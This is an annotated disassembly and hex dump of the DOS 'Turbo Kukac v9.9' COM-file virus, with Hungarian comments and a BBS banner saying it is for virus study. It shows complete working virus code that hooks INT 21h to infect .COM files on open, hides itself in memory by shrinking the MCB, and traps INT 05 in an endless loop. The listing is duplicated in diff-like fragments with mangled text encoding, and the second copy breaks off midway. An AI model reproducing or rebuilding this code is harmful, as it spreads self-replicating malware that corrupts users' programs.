28F8:0289 B90000 MOV CX,0000
|
||||
28F8:028C 8BD1 MOV DX,CX
|
||||
28F8:028E E81F00 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:0291 BA0001 MOV DX,0100 ;0100h ofset-t”l
|
||||
28F8:0294 B90002 MOV CX,0200 ;0200h byte virus hossza
|
||||
28F8:0297 B440 MOV AH,40 ;kiˇr s file-ba
|
||||
28F8:0299 E81400 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:029C B43E MOV AH,3E ;file z r sa
|
||||
28F8:029E E80F00 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:02A1 5E POP SI
|
||||
28F8:02A2 5F POP DI
|
||||
28F8:02A3 5A POP DX
|
||||
28F8:02A4 59 POP CX
|
||||
28F8:02A5 5B POP BX
|
||||
28F8:02A6 58 POP AX
|
||||
28F8:02A7 07 POP ES
|
||||
28F8:02A8 1F POP DS
|
||||
|
||||
28F8:02A9 90 NOP
|
||||
28F8:02AA 2E CS:
|
||||
28F8:02AB FF2EB702 JMP FAR [02B7] ;eredeti INT 21h-ra
|
||||
28F8:02AF CF IRET
|
||||
;Eredeti INT 21h hiv sa
|
||||
28F8:02B0 9C PUSHF ;elmenti mivel az IRET
|
||||
;visszamenti a flag-eket
|
||||
28F8:02B1 2E CS:
|
||||
28F8:02B2 FF1EB702 CALL FAR [02B7] ;eredeti INT 21h hiv sa
|
||||
28F8:02B6 C3 RET
|
||||
|
||||
28F8:02B7 16 PUSH SS
|
||||
28F8:02B8 130C ADC CX,[SI]
|
||||
28F8:02BA 0202 ADD AL,[BP+SI]
|
||||
28F8:02BC 00E9 ADD CL,CH
|
||||
28F8:02BE 06 PUSH ES
|
||||
28F8:02BF 06 PUSH ES
|
||||
28F8:02C0 05E906 ADD AX,06E9
|
||||
28F8:02C3 0405 ADD AL,05
|
||||
28F8:02C5 0100 ADD [BX+SI],AX
|
||||
28F8:02C7 0000 ADD [BX+SI],AL
|
||||
28F8:02C9 0001 ADD [BX+DI],AL
|
||||
28F8:02CB F0 LOCK
|
||||
28F8:02CC 0901 OR [BX+DI],AX
|
||||
28F8:02CE 54 PUSH SP
|
||||
28F8:02CF 7572 JNZ 0343
|
||||
28F8:02D1 62 DB 62
|
||||
28F8:02D2 6F DB 6F
|
||||
28F8:02D3 204B75 AND [BP+DI+75],CL
|
||||
28F8:02D6 6B DB 6B
|
||||
28F8:02D7 61 DB 61
|
||||
28F8:02D8 63 DB 63
|
||||
28F8:02D9 2039 AND [BX+DI],BH
|
||||
28F8:02DB 2E CS:
|
||||
28F8:02DC 3920 CMP [BX+SI],SP
|
||||
28F8:02DE 2020 AND [BX+SI],AH
|
||||
28F8:02E0 2020 AND [BX+SI],AH
|
||||
28F8:02E2 2024 AND [SI],AH
|
||||
28F8:02E4 0000 ADD [BX+SI],AL
|
||||
|
||||
28F8:02FC 0000 ADD [BX+SI],AL
|
||||
28F8:02FE FA CLI
|
||||
28F8:02FF 00C7 ADD BH,AL
|
||||
|
||||
Megjegyz‚s:
|
||||
|
||||
Nagyon primitˇv virus, de megvan a maga zsenialit sa, k‚t legyet
|
||||
<EFBFBD>t egy csap sra, pl COPY parancs eset‚n megnyit egy com file-t,s
|
||||
ha a virus a mem˘ri ban van, akkor m‚g a m soland˘ file-t megfer-
|
||||
t”zi, s a COPY m r a fert”z”tt file-t m solja! Nem igaz n k r-
|
||||
t‚kony vˇrus, puszt n minden<EFBFBD>tt ott akar lenni, s nehezˇteni a
|
||||
felhaszn l˘(k) munk j t! M‚rete nagyon kicsi, mind”ssze 512 byte!
|
||||
Hi nyoznak a vˇrusb˘l az (tapasztalataim szerint) eddigi virusok-
|
||||
ban fellelhet” ellen”rz‚sek, gondolok itt arra, hogy ha megt”rt‚nik
|
||||
egy file-ba (hoz) val˘ kiˇr s nem ellen”rzi a program hogy val˘ban
|
||||
kiˇrta-e azt az X byte-ot. Tov bb mikor rezidess‚ (nem {hivatalo-
|
||||
san} bejegyzetten) teszi mag t nem m˘dosˇtja az MCB. 13. byte-j n
|
||||
l‚v” RAM tetej‚nek a paragrafus cˇm‚tt a saj t maga lltal lefog-
|
||||
lalt m‚rettel (kivon s!), mint PL. a Yankee Doodle! A Yankee m‚g
|
||||
azt is megn‚zi, hogy amit meg akar fert”zni az az utols˘ mem˘.
|
||||
blokkban van-e, b r abban kell lennie, mert a DOS egy programnak
|
||||
odaadja a teljes szabad mem˘ri t, ami van...
|
||||
|
||||
|
||||
DUMP:
|
||||
|
||||
28F8:0100 E8 00 00 90 5E 50 51 B0-21 B4 35 CD 21 8C C0 3D ....^PQ.!.5.!..=
|
||||
28F8:0110 00 40 72 24 83 EE 03 BA-C1 02 81 EA 00 01 03 F2 .@r$............
|
||||
28F8:0120 8B 1C 8B 4C 02 89 1E 00-01 89 0E 02 01 8C D8 8E ...L............
|
||||
28F8:0130 C0 59 58 BB 00 01 FF E3-8C D8 48 8E D8 A1 03 00 .YX.......H.....
|
||||
28F8:0140 2D 41 00 A3 03 00 8C C8-8E D8 A1 02 00 2D 00 08 -A...........-..
|
||||
28F8:0150 8E C0 BF 00 01 83 EE 03-B9 00 02 F3 A4 8C 06 C7 ................
|
||||
28F8:0160 02 B9 6C 01 89 0E C5 02-FF 2E C5 02 8C C1 8C D8 ..l.............
|
||||
28F8:0170 26 A3 CB 02 B8 00 01 26-A3 C9 02 8C C0 8E D8 BA &......&........
|
||||
28F8:0180 C7 01 B0 05 B4 25 CD 21-B4 35 B0 21 CD 21 2E 89 .....%.!.5.!.!..
|
||||
28F8:0190 1E B7 02 8C C3 2E 89 1E-B9 02 B8 D9 01 8B D0 8B ................
|
||||
28F8:01A0 C1 8E D8 B0 21 B4 25 CD-21 8B 16 C1 02 8B 0E C3 ....!.%.!.......
|
||||
28F8:01B0 02 A1 CB 02 8E D8 89 16-00 01 89 0E 02 01 8E C0 ................
|
||||
28F8:01C0 59 58 2E FF 2E C9 02 90-50 1E 52 8C C8 8E D8 BA YX......P.R.....
|
||||
28F8:01D0 CE 02 B4 09 E8 D9 00 EB-F6 90 80 FC 3D 74 03 E9 ............=t..
|
||||
28F8:01E0 C7 00 90 1E 06 50 53 51-52 57 56 8B FA 8C DE 8E .....PSQRWV.....
|
||||
28F8:01F0 C6 B0 00 B9 32 00 FC F2-AE 83 EF 03 B8 4F 4D 26 ....2........OM&
|
||||
28F8:0200 3B 05 74 03 E9 9A 00 B8-2E 43 26 3B 45 FE 74 03 ;.t......C&;E.t.
|
||||
28F8:0210 E9 8E 00 B4 3D B0 02 E8-96 00 73 03 E9 82 00 8B ....=.....s.....
|
||||
28F8:0220 D8 B9 00 00 BA 00 00 B0-02 B4 42 E8 82 00 3D 00 ..........B...=.
|
||||
28F8:0230 FE 73 6E 2D 03 00 2E A3-BE 02 B4 42 B0 00 B9 00 .sn-.......B....
|
||||
28F8:0240 00 BA 00 00 E8 69 00 B4-3F B9 04 00 BA C1 02 8C .....i..?.......
|
||||
28F8:0250 CF 8E DF E8 5A 00 B0 05-3A 06 C4 02 74 43 B4 42 ....Z...:...tC.B
|
||||
28F8:0260 B0 00 B9 00 00 8B D1 E8-46 00 B0 E9 2E A2 BD 02 ........F.......
|
||||
28F8:0270 B0 05 2E A2 C0 02 B9 04-00 BA BD 02 8C C8 8E D8 ................
|
||||
28F8:0280 B4 40 E8 2B 00 B4 42 B0-02 B9 00 00 8B D1 E8 1F .@.+..B.........
|
||||
28F8:0290 00 BA 00 01 B9 00 02 B4-40 E8 14 00 B4 3E E8 0F ........@....>..
|
||||
28F8:02A0 00 5E 5F 5A 59 5B 58 07-1F 90 2E FF 2E B7 02 CF .^_ZY[X.........
|
||||
28F8:02B0 9C 2E FF 1E B7 02 C3 16-13 0C 02 02 00 E9 06 06 ................
|
||||
28F8:02C0 05 E9 06 04 05 01 00 00-00 00 01 F0 09 01 ..............
|
||||
|
||||
;Kiˇrand˘ sz”veg kezdete
|
||||
28F8:02C0 54 75 Tu
|
||||
28F8:02D0 72 62 6F 20 4B 75 6B 61-63 20 39 2E 39 20 20 20 rbo Kukac 9.9
|
||||
28F8:02E0 20 20 20 24 $
|
||||
|
||||
28F8:02E0 00 00 00 00-00 00 00 00 00 00 00 00 ............
|
||||
28F8:02F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 FA 00 ................
|
||||
28F8:0300 C7 .
|
||||
|
||||
;****************************************************************************;
|
||||
; ;
|
||||
; -=][][][][][][][][][][][][][][][=- ;
|
||||
; -=] P E R F E C T C R I M E [=- ;
|
||||
; -=] +31.(o)79.426o79 [=- ;
|
||||
; -=] [=- ;
|
||||
; -=] For All Your H/P/A/V Files [=- ;
|
||||
; -=] SysOp: Peter Venkman [=- ;
|
||||
; -=] [=- ;
|
||||
; -=] +31.(o)79.426o79 [=- ;
|
||||
; -=] P E R F E C T C R I M E [=- ;
|
||||
; -=][][][][][][][][][][][][][][][=- ;
|
||||
; ;
|
||||
; *** NOT FOR GENERAL DISTRIBUTION *** ;
|
||||
; ;
|
||||
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
|
||||
; Around Among the General Public. It Will be Very Useful for Learning how ;
|
||||
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
|
||||
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
|
||||
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
|
||||
; Is. Keep This Code in Responsible Hands! ;
|
||||
; ;
|
||||
;****************************************************************************;
|
|
@ -0,0 +1,426 @@
|
|||
;****************************************************************************;
|
||||
; ;
|
||||
; -=][][][][][][][][][][][][][][][=- ;
|
||||
; -=] P E R F E C T C R I M E [=- ;
|
||||
; -=] +31.(o)79.426o79 [=- ;
|
||||
; -=] [=- ;
|
||||
; -=] For All Your H/P/A/V Files [=- ;
|
||||
; -=] SysOp: Peter Venkman [=- ;
|
||||
; -=] [=- ;
|
||||
; -=] +31.(o)79.426o79 [=- ;
|
||||
; -=] P E R F E C T C R I M E [=- ;
|
||||
; -=][][][][][][][][][][][][][][][=- ;
|
||||
; ;
|
||||
; *** NOT FOR GENERAL DISTRIBUTION *** ;
|
||||
; ;
|
||||
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
|
||||
; Around Among the General Public. It Will be Very Useful for Learning how ;
|
||||
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
|
||||
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
|
||||
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
|
||||
; Is. Keep This Code in Responsible Hands! ;
|
||||
; ;
|
||||
;****************************************************************************;
|
||||
TURBO KUKAC v9.9 virus unassembled list:
|
||||
`90.07.21.
|
||||
|
||||
Magyar zat: K”v ri L szl˘
|
||||
Tel.: (41) 21-822 07-13:20 mh.
|
||||
21-033 18:00-
|
||||
|
||||
|
||||
|
||||
28F8:0100 E80000 CALL 0103 ;IP ‚rt‚ke az SI-be
|
||||
28F8:0103 90 NOP ;ez lesz a b zis offset
|
||||
28F8:0104 5E POP SI
|
||||
28F8:0105 50 PUSH AX
|
||||
28F8:0106 51 PUSH CX
|
||||
28F8:0107 B021 MOV AL,21
|
||||
28F8:0109 B435 MOV AH,35
|
||||
28F8:010B CD21 INT 21 ;INT 21h cˇm‚nek lek‚r-
|
||||
;dez‚se
|
||||
28F8:010D 8CC0 MOV AX,ES
|
||||
28F8:010F 3D0040 CMP AX,4000 ;a mem˘ri ban van ?
|
||||
28F8:0112 7224 JB 0138 ;nincs!
|
||||
28F8:0114 83EE03 SUB SI,+03 ;b zis offset -3
|
||||
;(3 byte hosszu a JMP
|
||||
;+ az operandusa!)
|
||||
28F8:0117 BAC102 MOV DX,02C1
|
||||
28F8:011A 81EA0001 SUB DX,0100 ;0100h offset levon sa
|
||||
;(COM file saj toss ga!)
|
||||
28F8:011E 03F2 ADD SI,DX
|
||||
28F8:0120 8B1C MOV BX,[SI] ;JMP k˘dja + az operan-
|
||||
;dus fele
|
||||
28F8:0122 8B4C02 MOV CX,[SI+02] ;JMP operandusa + 1 byte
|
||||
28F8:0125 891E0001 MOV [0100],BX ;eredeti prg kezdet
|
||||
28F8:0129 890E0201 MOV [0102],CX ;let rol sa
|
||||
28F8:012D 8CD8 MOV AX,DS
|
||||
28F8:012F 8EC0 MOV ES,AX ;ES=DS
|
||||
28F8:0131 59 POP CX
|
||||
28F8:0132 58 POP AX
|
||||
28F8:0133 BB0001 MOV BX,0100 ;ugr s offset-je
|
||||
28F8:0136 FFE3 JMP BX ;EREDETI PROGRAM V<>GRE-
|
||||
;HAJTŹSA
|
||||
|
||||
;HA M<>G NINCS A MEM˘RIŹBAN
|
||||
28F8:0138 8CD8 MOV AX,DS ;saj t szegmense
|
||||
28F8:013A 48 DEC AX ;saj t seg-1= MCB. seg.
|
||||
28F8:013B 8ED8 MOV DS,AX ;DS=MCB. szegmense
|
||||
28F8:013D A10300 MOV AX,[0003] ;DOS lltal a programnak
|
||||
;foglalt mem˘riablokk
|
||||
;hossza
|
||||
28F8:0140 2D4100 SUB AX,0041 ;virus hossz t levonja
|
||||
;bel”le (41*16 byte)
|
||||
28F8:0143 A30300 MOV [0003],AX ;visszateszi igy a DOS
|
||||
; lltal l tott teljes
|
||||
;mem˘ria nagys ga a prg.
|
||||
;kil‚p‚se ut n (41*16
|
||||
;byte-tal) kevesebb lesz
|
||||
;Hasonl˘an csin lja ezt
|
||||
;a YANKEE DOODLE is, s
|
||||
;ezzel azt ‚ri el, hogy
|
||||
;semmilyen
|
||||
;System Storage Map
|
||||
;programmal nem mutat-
|
||||
;hat˘ ki a virus jele-
|
||||
;l‚te a mem˘ri ban!
|
||||
;A PCTOOLS system info
|
||||
;kimutatja, azaz csak
|
||||
;annyit l tni, hogy a
|
||||
;fizikai RAM m‚ret 640K
|
||||
;s a DOS lltal l tott
|
||||
;az 639k byte! Igy k”-
|
||||
;vetkeztetni lehet...
|
||||
28F8:0146 8CC8 MOV AX,CS
|
||||
28F8:0148 8ED8 MOV DS,AX ;DS=CS
|
||||
28F8:014A A10200 MOV AX,[0002] ;PSP-ben a RAM tetej‚-
|
||||
;nek a paragrafuscˇme
|
||||
28F8:014D 2D0008 SUB AX,0800
|
||||
28F8:0150 8EC0 MOV ES,AX ;virus Łj szegmense
|
||||
28F8:0152 BF0001 MOV DI,0100
|
||||
28F8:0155 83EE03 SUB SI,+03
|
||||
28F8:0158 B90002 MOV CX,0200 ;virus hossza
|
||||
28F8:015B F3 REPZ
|
||||
28F8:015C A4 MOVSB ;virus m sol sa az Łj
|
||||
;szegmensbe
|
||||
28F8:015D 8C06C702 MOV [02C7],ES ;Łj szegmens t rol sa
|
||||
28F8:0161 B96C01 MOV CX,016C ;bel‚p‚si pont
|
||||
28F8:0164 890EC502 MOV [02C5],CX ;t rol sa
|
||||
28F8:0168 FF2EC502 JMP FAR [02C5] ;ugr s az Łj szegmens
|
||||
;01c6 offset-‚re
|
||||
;UJ SZEGMENSBEN A BEL<45>P<EFBFBD>SI PONT
|
||||
28F8:016C 8CC1 MOV CX,ES
|
||||
28F8:016E 8CD8 MOV AX,DS ;ahonnan m solta mag t
|
||||
28F8:0170 26 ES:
|
||||
28F8:0171 A3CB02 MOV [02CB],AX ;R<>GI PRG. segment cˇm
|
||||
28F8:0174 B80001 MOV AX,0100
|
||||
28F8:0177 26 ES:
|
||||
28F8:0178 A3C902 MOV [02C9],AX ;0100h offset t rol sa
|
||||
28F8:017B 8CC0 MOV AX,ES
|
||||
28F8:017D 8ED8 MOV DS,AX
|
||||
28F8:017F BAC701 MOV DX,01C7 ;INT 05 - HARD COPY Łj
|
||||
;offset-je
|
||||
28F8:0182 B005 MOV AL,05
|
||||
28F8:0184 B425 MOV AH,25
|
||||
28F8:0186 CD21 INT 21 ;INT 05 ellop sa
|
||||
28F8:0188 B435 MOV AH,35
|
||||
28F8:018A B021 MOV AL,21
|
||||
28F8:018C CD21 INT 21 ;INT 21h cˇm lek‚rdez‚-
|
||||
;se
|
||||
28F8:018E 2E CS:
|
||||
28F8:018F 891EB702 MOV [02B7],BX ;INT 05h offset (r‚gi)
|
||||
28F8:0193 8CC3 MOV BX,ES
|
||||
28F8:0195 2E CS:
|
||||
28F8:0196 891EB902 MOV [02B9],BX ;INT 05h segment (r‚gi)
|
||||
28F8:019A B8D901 MOV AX,01D9 ;Łj INT 21h offset cˇm
|
||||
28F8:019D 8BD0 MOV DX,AX
|
||||
28F8:019F 8BC1 MOV AX,CX
|
||||
28F8:01A1 8ED8 MOV DS,AX
|
||||
28F8:01A3 B021 MOV AL,21
|
||||
28F8:01A5 B425 MOV AH,25
|
||||
28F8:01A7 CD21 INT 21 ;INT 21h ellop sa
|
||||
28F8:01A9 8B16C102 MOV DX,[02C1] ;EREDETI JMP + AZ
|
||||
28F8:01AD 8B0EC302 MOV CX,[02C3] ;OPERANDUSA!!!
|
||||
28F8:01B1 A1CB02 MOV AX,[02CB] ;EREDETI PRG. SEG!!!
|
||||
28F8:01B4 8ED8 MOV DS,AX
|
||||
28F8:01B6 89160001 MOV [0100],DX ;eredeti JMP k˘dja
|
||||
28F8:01BA 890E0201 MOV [0102],CX ;‚s operandusa
|
||||
28F8:01BE 8EC0 MOV ES,AX
|
||||
28F8:01C0 59 POP CX
|
||||
28F8:01C1 58 POP AX
|
||||
28F8:01C2 2E CS:
|
||||
28F8:01C3 FF2EC902 JMP FAR [02C9] ;EREDETI PROGRAM FUTTA-
|
||||
;TŹSA!
|
||||
;Łj INT 05 - HARD COPY rutin
|
||||
28F8:01C7 90 NOP
|
||||
28F8:01C8 50 PUSH AX
|
||||
28F8:01C9 1E PUSH DS
|
||||
28F8:01CA 52 PUSH DX
|
||||
28F8:01CB 8CC8 MOV AX,CS
|
||||
28F8:01CD 8ED8 MOV DS,AX
|
||||
;V<>GTELEN CIKLUS!
|
||||
28F8:01CF BACE02 MOV DX,02CE ;sz”veg kezdete
|
||||
;Turbo Kukac v9.9
|
||||
28F8:01D2 B409 MOV AH,09 ;print string
|
||||
28F8:01D4 E8D900 CALL 02B0 ;r‚gi INT 21h hiv sa
|
||||
28F8:01D7 EBF6 JMP 01CF ;Łjra!
|
||||
|
||||
;Łj INT 21h rutin
|
||||
28F8:01D9 90 NOP
|
||||
28F8:01DA 80FC3D CMP AH,3D ;file nyit sa alfunkci˘?
|
||||
28F8:01DD 7403 JZ 01E2 ;igen
|
||||
28F8:01DF E9C700 JMP 02A9 ;nem ugr sa az eredeti
|
||||
;INT 21h-ra
|
||||
28F8:01E2 90 NOP
|
||||
28F8:01E3 1E PUSH DS
|
||||
28F8:01E4 06 PUSH ES
|
||||
28F8:01E5 50 PUSH AX
|
||||
28F8:01E6 53 PUSH BX
|
||||
28F8:01E7 51 PUSH CX
|
||||
28F8:01E8 52 PUSH DX
|
||||
28F8:01E9 57 PUSH DI
|
||||
28F8:01EA 56 PUSH SI
|
||||
|
||||
;File kiterjeszt‚s ellen”rz‚se
|
||||
|
||||
28F8:01EB 8BFA MOV DI,DX ;file PATH kezdete
|
||||
28F8:01ED 8CDE MOV SI,DS
|
||||
28F8:01EF 8EC6 MOV ES,SI ;ES=DS (igy a file PATH
|
||||
; tv‚tele!)
|
||||
28F8:01F1 B000 MOV AL,00 ;PATH lez r˘ nulla
|
||||
28F8:01F3 B93200 MOV CX,0032 ;file secifik ci˘ hossza
|
||||
28F8:01F6 FC CLD ;el”re
|
||||
28F8:01F7 F2 REPNZ
|
||||
28F8:01F8 AE SCASB ;PATH lez r˘ 0 byte ke-
|
||||
;res‚se
|
||||
28F8:01F9 83EF03 SUB DI,+03 ;-3 igy a kiterjeszt‚s
|
||||
;kezdet+1 pozici˘ra mu-
|
||||
;tat
|
||||
28F8:01FC B84F4D MOV AX,4D4F ;'OM' AX-be
|
||||
28F8:01FF 26 ES:
|
||||
28F8:0200 3B05 CMP AX,[DI] ; 'OM' a v‚ge ?
|
||||
28F8:0202 7403 JZ 0207 ;igen val szin<69>leg COM
|
||||
;file
|
||||
28F8:0204 E99A00 JMP 02A1 ;nem COM ugr s az erede-
|
||||
;ti INT 21h-ra
|
||||
28F8:0207 B82E43 MOV AX,432E ;'.C' AX-be
|
||||
28F8:020A 26 ES:
|
||||
28F8:020B 3B45FE CMP AX,[DI-02] ; '.C' ?
|
||||
28F8:020E 7403 JZ 0213 ;biztos hogy COM file!
|
||||
28F8:0210 E98E00 JMP 02A1 ;nem COM ugr s az erede-
|
||||
;ti INT 21h-ra
|
||||
;File nyit sa
|
||||
|
||||
28F8:0213 B43D MOV AH,3D ;file nyit s
|
||||
28F8:0215 B002 MOV AL,02 ;ˇr s/olvas s
|
||||
28F8:0217 E89600 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:021A 7303 JNB 021F ;ha nincs hiba
|
||||
28F8:021C E98200 JMP 02A1 ;hiba eset‚n ugr s az
|
||||
;eredeti INT 21h-ra
|
||||
28F8:021F 8BD8 MOV BX,AX ;file kezel”
|
||||
|
||||
;File m‚ret ellen”rz‚s
|
||||
|
||||
28F8:0221 B90000 MOV CX,0000
|
||||
28F8:0224 BA0000 MOV DX,0000
|
||||
28F8:0227 B002 MOV AL,02 ;file v‚g‚re
|
||||
28F8:0229 B442 MOV AH,42 ;file pointer mozgat sa
|
||||
28F8:022B E88200 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:022E 3D00FE CMP AX,FE00
|
||||
28F8:0231 736E JNB 02A1 ;ha nem nagyobb a file
|
||||
;65024 byte-n l
|
||||
28F8:0233 2D0300 SUB AX,0003 ;JMP+op hossza
|
||||
|
||||
;Fert”zend” file eredeti 4 byte j nak
|
||||
;beolvas sa
|
||||
|
||||
28F8:0236 2E CS:
|
||||
28F8:0237 A3BE02 MOV [02BE],AX ;let rolja
|
||||
28F8:023A B442 MOV AH,42 ;file pointer mozgat sa
|
||||
28F8:023C B000 MOV AL,00 ;file elej‚re
|
||||
28F8:023E B90000 MOV CX,0000
|
||||
28F8:0241 BA0000 MOV DX,0000
|
||||
28F8:0244 E86900 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:0247 B43F MOV AH,3F ;olvas s file-b˘l
|
||||
28F8:0249 B90400 MOV CX,0004 ;4 byte
|
||||
28F8:024C BAC102 MOV DX,02C1 ;ide tegye
|
||||
28F8:024F 8CCF MOV DI,CS
|
||||
28F8:0251 8EDF MOV DS,DI ;DS=CS
|
||||
28F8:0253 E85A00 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:0256 B005 MOV AL,05
|
||||
28F8:0258 3A06C402 CMP AL,[02C4] ;utols˘ byte=5 ?
|
||||
28F8:025C 7443 JZ 02A1 ;igen, ugr s az eredeti
|
||||
;INT 21h -ra
|
||||
|
||||
;Fert”zend” file-ba a virusra
|
||||
;mutat˘ JMP+op. kiˇr sa (4 byte)
|
||||
|
||||
28F8:025E B442 MOV AH,42 ;file pointer mozgat sa
|
||||
28F8:0260 B000 MOV AL,00 ;file elej‚re
|
||||
28F8:0262 B90000 MOV CX,0000
|
||||
28F8:0265 8BD1 MOV DX,CX
|
||||
28F8:0267 E84600 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:026A B0E9 MOV AL,E9 ;JMP k˘dja
|
||||
28F8:026C 2E CS:
|
||||
28F8:026D A2BD02 MOV [02BD],AL ;let rolja
|
||||
28F8:0270 B005 MOV AL,05
|
||||
28F8:0272 2E CS:
|
||||
28F8:0273 A2C002 MOV [02C0],AL
|
||||
28F8:0276 B90400 MOV CX,0004 ;4 byte
|
||||
28F8:0279 BABD02 MOV DX,02BD ;JMP + op. kezdete
|
||||
28F8:027C 8CC8 MOV AX,CS
|
||||
28F8:027E 8ED8 MOV DS,AX
|
||||
28F8:0280 B440 MOV AH,40 ;kiˇr s file-ba
|
||||
28F8:0282 E82B00 CALL 02B0 ;INT 21h hiv sa
|
||||
|
||||
;Program megfert”z‚se 0200h byte kiˇr sa
|
||||
;azaz a virus m”g‚m sol sa
|
||||
|
||||
28F8:0285 B442 MOV AH,42 ;file pointer mozgat sa
|
||||
28F8:0287 B002 MOV AL,02 ;file v‚g‚re
|
||||
28F8:0289 B90000 MOV CX,0000
|
||||
28F8:028C 8BD1 MOV DX,CX
|
||||
28F8:028E E81F00 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:0291 BA0001 MOV DX,0100 ;0100h ofset-t”l
|
||||
28F8:0294 B90002 MOV CX,0200 ;0200h byte virus hossza
|
||||
28F8:0297 B440 MOV AH,40 ;kiˇr s file-ba
|
||||
28F8:0299 E81400 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:029C B43E MOV AH,3E ;file z r sa
|
||||
28F8:029E E80F00 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:02A1 5E POP SI
|
||||
28F8:02A2 5F POP DI
|
||||
28F8:02A3 5A POP DX
|
||||
28F8:02A4 59 POP CX
|
||||
28F8:02A5 5B POP BX
|
||||
28F8:02A6 58 POP AX
|
||||
28F8:02A7 07 POP ES
|
||||
28F8:02A8 1F POP DS
|
||||
|
||||
28F8:02A9 90 NOP
|
||||
28F8:02AA 2E CS:
|
||||
28F8:02AB FF2EB702 JMP FAR [02B7] ;eredeti INT 21h-ra
|
||||
28F8:02AF CF IRET
|
||||
;Eredeti INT 21h hiv sa
|
||||
28F8:02B0 9C PUSHF ;elmenti mivel az IRET
|
||||
;visszamenti a flag-eket
|
||||
28F8:02B1 2E CS:
|
||||
28F8:02B2 FF1EB702 CALL FAR [02B7] ;eredeti INT 21h hiv sa
|
||||
28F8:02B6 C3 RET
|
||||
|
||||
28F8:02B7 16 PUSH SS
|
||||
28F8:02B8 130C ADC CX,[SI]
|
||||
28F8:02BA 0202 ADD AL,[BP+SI]
|
||||
28F8:02BC 00E9 ADD CL,CH
|
||||
28F8:02BE 06 PUSH ES
|
||||
28F8:02BF 06 PUSH ES
|
||||
28F8:02C0 05E906 ADD AX,06E9
|
||||
28F8:02C3 0405 ADD AL,05
|
||||
28F8:02C5 0100 ADD [BX+SI],AX
|
||||
28F8:02C7 0000 ADD [BX+SI],AL
|
||||
28F8:02C9 0001 ADD [BX+DI],AL
|
||||
28F8:02CB F0 LOCK
|
||||
28F8:02CC 0901 OR [BX+DI],AX
|
||||
28F8:02CE 54 PUSH SP
|
||||
28F8:02CF 7572 JNZ 0343
|
||||
28F8:02D1 62 DB 62
|
||||
28F8:02D2 6F DB 6F
|
||||
28F8:02D3 204B75 AND [BP+DI+75],CL
|
||||
28F8:02D6 6B DB 6B
|
||||
28F8:02D7 61 DB 61
|
||||
28F8:02D8 63 DB 63
|
||||
28F8:02D9 2039 AND [BX+DI],BH
|
||||
28F8:02DB 2E CS:
|
||||
28F8:02DC 3920 CMP [BX+SI],SP
|
||||
28F8:02DE 2020 AND [BX+SI],AH
|
||||
28F8:02E0 2020 AND [BX+SI],AH
|
||||
28F8:02E2 2024 AND [SI],AH
|
||||
28F8:02E4 0000 ADD [BX+SI],AL
|
||||
|
||||
28F8:02FC 0000 ADD [BX+SI],AL
|
||||
28F8:02FE FA CLI
|
||||
28F8:02FF 00C7 ADD BH,AL
|
||||
|
||||
Megjegyz‚s:
|
||||
|
||||
Nagyon primitˇv virus, de megvan a maga zsenialit sa, k‚t legyet
|
||||
<09>t egy csap sra, pl COPY parancs eset‚n megnyit egy com file-t,s
|
||||
ha a virus a mem˘ri ban van, akkor m‚g a m soland˘ file-t megfer-
|
||||
t”zi, s a COPY m r a fert”z”tt file-t m solja! Nem igaz n k r-
|
||||
t‚kony vˇrus, puszt n minden<65>tt ott akar lenni, s nehezˇteni a
|
||||
felhaszn l˘(k) munk j t! M‚rete nagyon kicsi, mind”ssze 512 byte!
|
||||
Hi nyoznak a vˇrusb˘l az (tapasztalataim szerint) eddigi virusok-
|
||||
ban fellelhet” ellen”rz‚sek, gondolok itt arra, hogy ha megt”rt‚nik
|
||||
egy file-ba (hoz) val˘ kiˇr s nem ellen”rzi a program hogy val˘ban
|
||||
kiˇrta-e azt az X byte-ot. Tov bb mikor rezidess‚ (nem {hivatalo-
|
||||
san} bejegyzetten) teszi mag t nem m˘dosˇtja az MCB. 13. byte-j n
|
||||
l‚v” RAM tetej‚nek a paragrafus cˇm‚tt a saj t maga lltal lefog-
|
||||
lalt m‚rettel (kivon s!), mint PL. a Yankee Doodle! A Yankee m‚g
|
||||
azt is megn‚zi, hogy amit meg akar fert”zni az az utols˘ mem˘.
|
||||
blokkban van-e, b r abban kell lennie, mert a DOS egy programnak
|
||||
odaadja a teljes szabad mem˘ri t, ami van...
|
||||
|
||||
|
||||
DUMP:
|
||||
|
||||
28F8:0100 E8 00 00 90 5E 50 51 B0-21 B4 35 CD 21 8C C0 3D ....^PQ.!.5.!..=
|
||||
28F8:0110 00 40 72 24 83 EE 03 BA-C1 02 81 EA 00 01 03 F2 .@r$............
|
||||
28F8:0120 8B 1C 8B 4C 02 89 1E 00-01 89 0E 02 01 8C D8 8E ...L............
|
||||
28F8:0130 C0 59 58 BB 00 01 FF E3-8C D8 48 8E D8 A1 03 00 .YX.......H.....
|
||||
28F8:0140 2D 41 00 A3 03 00 8C C8-8E D8 A1 02 00 2D 00 08 -A...........-..
|
||||
28F8:0150 8E C0 BF 00 01 83 EE 03-B9 00 02 F3 A4 8C 06 C7 ................
|
||||
28F8:0160 02 B9 6C 01 89 0E C5 02-FF 2E C5 02 8C C1 8C D8 ..l.............
|
||||
28F8:0170 26 A3 CB 02 B8 00 01 26-A3 C9 02 8C C0 8E D8 BA &......&........
|
||||
28F8:0180 C7 01 B0 05 B4 25 CD 21-B4 35 B0 21 CD 21 2E 89 .....%.!.5.!.!..
|
||||
28F8:0190 1E B7 02 8C C3 2E 89 1E-B9 02 B8 D9 01 8B D0 8B ................
|
||||
